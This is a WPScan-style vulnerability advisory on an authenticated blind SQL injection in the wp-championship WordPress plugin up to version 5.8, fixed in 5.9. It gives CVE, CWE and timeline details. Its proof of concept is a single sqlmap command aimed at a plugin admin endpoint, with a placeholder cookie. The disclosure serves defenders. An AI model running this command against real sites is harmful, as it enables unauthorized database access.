wp-championship <= 5.8 - Authenticated Blind SQL Injection



Proof of Concept
$ sqlmap -u 'http://www.example.com/wp-admin/wp-championship/cs_admin_users.php&userid=' --data="isadmin=1&user" --cookie=AUTH_COOKIE_HERE --level=5 --risk=3

Affects Plugin

fixed in version 5.9

References

CVE 2015-5308
URL https://vapid.dhs.org/advisory.php?v=155

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Larry W. Cashdollar
Submitter Twitter _larry0
Views 7261
Verified No
WPVDB ID 8221

Timeline

Publicly Published 2015-10-23 (over 4 years ago)
Added 2015-10-27 (over 4 years ago)
Last Updated 2019-10-31 (8 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin